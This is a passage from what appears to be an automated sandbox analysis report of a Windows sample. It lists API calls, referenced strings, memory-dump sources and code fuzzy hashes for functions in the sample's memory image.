                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00885B8B
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00885C00
                                                            • WSACleanup.WSOCK32 ref: 00885C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 9e188a3d1c1a939479164b2c66b6b97fc02b83281ed6fa68a914b1957288b660
                                                            • Instruction ID: f462d71b2ddd07a661dbdbe14fbbdb0423ae95d5d03aec2cf28eecd460a4af85
                                                            • Opcode Fuzzy Hash: 9e188a3d1c1a939479164b2c66b6b97fc02b83281ed6fa68a914b1957288b660
                                                            • Instruction Fuzzy Hash: 2F517D316047109FDB11AF28CC95B6ABBE4FF48720F14892AF596DB2A1DB70EC40CB52
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087B73B
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0087B7B1
                                                            • GetLastError.KERNEL32 ref: 0087B7BB
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0087B828
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 9df5a2b6f68e04d5faf2ce20fa631441b9eac2e71e7ed84542c63f57495a32e3
                                                            • Instruction ID: c93304345e4d000de139f1997c367ed614009ace50c906b4f28a4313222a3219
                                                            • Opcode Fuzzy Hash: 9df5a2b6f68e04d5faf2ce20fa631441b9eac2e71e7ed84542c63f57495a32e3
                                                            • Instruction Fuzzy Hash: AB31A035A002089FCB08EF68C885BBE7BB9FF44754F14802AE51AD7295DB71DD42C752
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008694F6
                                                            • GetDlgCtrlID.USER32 ref: 00869501
                                                            • GetParent.USER32 ref: 0086951D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00869520
                                                            • GetDlgCtrlID.USER32(?), ref: 00869529
                                                            • GetParent.USER32(?), ref: 00869545
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00869548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: edd40f1d0c052eba92e55826bfd0d5fa540a88c19d10aa30f32b366a97d2c9d9
                                                            • Instruction ID: 4fc10abad8aabc524df066b19b2a7c63c033abac3a24cdaf74a9c13d91242dc9
                                                            • Opcode Fuzzy Hash: edd40f1d0c052eba92e55826bfd0d5fa540a88c19d10aa30f32b366a97d2c9d9
                                                            • Instruction Fuzzy Hash: 6D21E270A00204BBCF05AB64CC85EFEBB79FF55300F10015AF662D72E2DB759959DA21
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008695DF
                                                            • GetDlgCtrlID.USER32 ref: 008695EA
                                                            • GetParent.USER32 ref: 00869606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00869609
                                                            • GetDlgCtrlID.USER32(?), ref: 00869612
                                                            • GetParent.USER32(?), ref: 0086962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00869631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 33d0687d648ec5c25c4575b7c8c6d8a046e3819da8e5bd5ae6a30fc5ed599fbd
                                                            • Instruction ID: 00a4b1d1c1d421f4cb1693670fa9262d82c480b2c02ef8a518aa9f045cb8a39e
                                                            • Opcode Fuzzy Hash: 33d0687d648ec5c25c4575b7c8c6d8a046e3819da8e5bd5ae6a30fc5ed599fbd
                                                            • Instruction Fuzzy Hash: 3221D670A00204BBDF05AB64CC85EFEBB78FF54300F150056F562D72E2DB759959DA21
                                                            APIs
                                                            • GetParent.USER32 ref: 00869651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00869666
                                                            • _wcscmp.LIBCMT ref: 00869678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008696F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: d614c285f25c3ebc2a137482147d74de283c699b6e846f1f13cbcb2542f4db31
                                                            • Instruction ID: 004034b02532ea239d6ac28f5a1c410c0befeecb70dd54cd71f0c2b62c7a8e72
                                                            • Opcode Fuzzy Hash: d614c285f25c3ebc2a137482147d74de283c699b6e846f1f13cbcb2542f4db31
                                                            • Instruction Fuzzy Hash: 93114076248307FAFE052624EC0BDA6779CFB24374F21006BFA50E50D1FE71D9108699
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00888BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00888C19
                                                            • CoUninitialize.OLE32 ref: 00888C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00888D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00888E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,008A2C0C), ref: 00888E84
                                                            • CoGetObject.OLE32(?,00000000,008A2C0C,?), ref: 00888EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00888EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00888F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00888F4A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: af5d03c398ac6e569891228c3995ea08f33a6799c52b39696b91d0bdb4291d22
                                                            • Instruction ID: 501861a9c16891dc7ac04ad118b1164f89b5b355baa3c44870d26f58163861e7
                                                            • Opcode Fuzzy Hash: af5d03c398ac6e569891228c3995ea08f33a6799c52b39696b91d0bdb4291d22
                                                            • Instruction Fuzzy Hash: A8C10FB1208205EFD700EF68C88496ABBE9FF89348F44496DF58ADB251DB71ED05CB52
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0087419D
                                                            • __swprintf.LIBCMT ref: 008741AA
                                                              • Part of subcall function 008338D8: __woutput_l.LIBCMT ref: 00833931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 008741D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 008741E0
                                                            • LockResource.KERNEL32(00000000), ref: 008741ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0087420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0087421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0087422E
                                                            • LockResource.KERNEL32(?), ref: 0087423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0087429B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 755e26c179cd513e24d9057b1c991bd2c99093622e3a22e0443119ddcd5370d8
                                                            • Instruction ID: 7e457e92a87b83fe1935c1b00cc19f5e6016df4803c72442bad59e2070123d19
                                                            • Opcode Fuzzy Hash: 755e26c179cd513e24d9057b1c991bd2c99093622e3a22e0443119ddcd5370d8
                                                            • Instruction Fuzzy Hash: C931907160521AABDB15AFA0EC44EBF7BADFF04301F048526F909D2152E770DA618BA1
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0081FC06
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0081FCA5
                                                            • UnregisterHotKey.USER32(?), ref: 0081FDFC
                                                            • DestroyWindow.USER32(?), ref: 00854A00
                                                            • FreeLibrary.KERNEL32(?), ref: 00854A65
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00854A92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: ad4225f94d87dafe7adcf246ad0672017b45af1cf8e6b2e47f63e9ce0e826bd2
                                                            • Instruction ID: 548aed764d10f28a33cb285f851013db55c79cf53083652d458f3669fda9b423
                                                            • Opcode Fuzzy Hash: ad4225f94d87dafe7adcf246ad0672017b45af1cf8e6b2e47f63e9ce0e826bd2
                                                            • Instruction Fuzzy Hash: FEA18E30701222CFCB19EF18D495AA9F768FF04715F1442ADE90AEB252DB30AD96CF95
                                                            APIs
                                                            • EnumChildWindows.USER32(?,0086AA64), ref: 0086A9A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 4ff22dea8ceed63f97e27d67e74b909462f516edbc8ff549990a7a7184cd127d
                                                            • Instruction ID: e1cb9f4c35e99f1d6a140443b4780fd964d48af339ce26a35a1af10c69ed3f4e
                                                            • Opcode Fuzzy Hash: 4ff22dea8ceed63f97e27d67e74b909462f516edbc8ff549990a7a7184cd127d
                                                            • Instruction Fuzzy Hash: 3B916470500506EADB1CDF64C481BE9FB79FF44304F518129D59AF7251DB30A999CF92
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00812EAE
                                                              • Part of subcall function 00811DB3: GetClientRect.USER32(?,?), ref: 00811DDC
                                                              • Part of subcall function 00811DB3: GetWindowRect.USER32(?,?), ref: 00811E1D
                                                              • Part of subcall function 00811DB3: ScreenToClient.USER32(?,?), ref: 00811E45
                                                            • GetDC.USER32 ref: 0084CF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0084CF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0084CFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0084CFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 0084CFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0084D04B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: f81e69b003207bf035653d3b5e78b49ad84864b5ae40f491432bb5ab055b0249
                                                            • Instruction ID: 7a3d613cc2e5a4a7251e2b931ed4a7417ee67093467a6185673ff29af9d8e621
                                                            • Opcode Fuzzy Hash: f81e69b003207bf035653d3b5e78b49ad84864b5ae40f491432bb5ab055b0249
                                                            • Instruction Fuzzy Hash: 7D71D23050120DDFCF219F68C880AEA7BBAFF49314F18426AED55DB266DB318C91DB61
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                              • Part of subcall function 00812344: GetCursorPos.USER32(?), ref: 00812357
                                                              • Part of subcall function 00812344: ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0089C2E4
                                                            • ImageList_EndDrag.COMCTL32 ref: 0089C2EA
                                                            • ReleaseCapture.USER32 ref: 0089C2F0
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0089C39A
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0089C3AD
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0089C48F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: eafa0a28ac4f0876e40763deefe1bfad7950f2bb9d42c98f168e42327b760416
                                                            • Instruction ID: a687deb2da8ad50cbe73227ab4ddd55df51c87aad275f5d11ca9f38cfce12d43
                                                            • Opcode Fuzzy Hash: eafa0a28ac4f0876e40763deefe1bfad7950f2bb9d42c98f168e42327b760416
                                                            • Instruction Fuzzy Hash: 3C516D70204345AFDB04EF24C896FAA7BE5FF88310F04462EF595CB2A2DB719958DB52
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0089F910), ref: 0088903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0089F910), ref: 00889071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008891EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00889215
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 2aa5c7a139d5e341f6ff2a4bc80844f8f67c72008d9d0f111b7dd1c02e9fa7c5
                                                            • Instruction ID: 90f677c2899096afed5e4767705f38033c9058e7dae97652e16951e4f9a11480
                                                            • Opcode Fuzzy Hash: 2aa5c7a139d5e341f6ff2a4bc80844f8f67c72008d9d0f111b7dd1c02e9fa7c5
                                                            • Instruction Fuzzy Hash: 0AF11675A00219EFCB04EF98C888EAEB7B9FF49314F148059F556EB291DB31AE45CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0088F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0088FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0088FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0088FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0088FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0088FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0088FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0088FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0088FE36
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: c57988c646a3da193946a47750cf6cc2c403588a3e721e3da1080534c757a81c
                                                            • Instruction ID: 294c8111e5318820f1bd03cccf5fbca80ad3344af99918e2f5c6cd096b2064bc
                                                            • Opcode Fuzzy Hash: c57988c646a3da193946a47750cf6cc2c403588a3e721e3da1080534c757a81c
                                                            • Instruction Fuzzy Hash: CFE18E71204211DFCB24EF28C491A6ABBE5FF84354F14856DFA99DB2A2DB31DC44CB52
                                                            APIs
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008738D3,?), ref: 008748C7
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008738D3,?), ref: 008748E0
                                                              • Part of subcall function 00874CD3: GetFileAttributesW.KERNEL32(?,00873947), ref: 00874CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00874FE2
                                                            • _wcscmp.LIBCMT ref: 00874FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00875017
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 4099481781de741d48f6ed6dcdd0ecf55cd79bd94c36ed1afd5816d985df0526
                                                            • Instruction ID: 19359e846ebfca08b52b20269cdeb585c765150d613b0368365d1b42bfd5c4e5
                                                            • Opcode Fuzzy Hash: 4099481781de741d48f6ed6dcdd0ecf55cd79bd94c36ed1afd5816d985df0526
                                                            • Instruction Fuzzy Hash: 0F513DB25087859BC724EB64D8819DBB3ECFF85301F00492EB289D7152EF75E2888767
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0089896E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: a833c06ce2f9eb709d481eabac177d7a235bff5a17ad004939f3a22da94563b4
                                                            • Instruction ID: c27f3221581fd630668ff8fa7d844b59e30f91c05a204ec6787e4f5d135f4e73
                                                            • Opcode Fuzzy Hash: a833c06ce2f9eb709d481eabac177d7a235bff5a17ad004939f3a22da94563b4
                                                            • Instruction Fuzzy Hash: 5851D63060021AFFDF24BF28CC85BA97BA5FF06354F684122F515E65A1DF71A990CB52
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0084C547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0084C569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0084C581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0084C59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0084C5C0
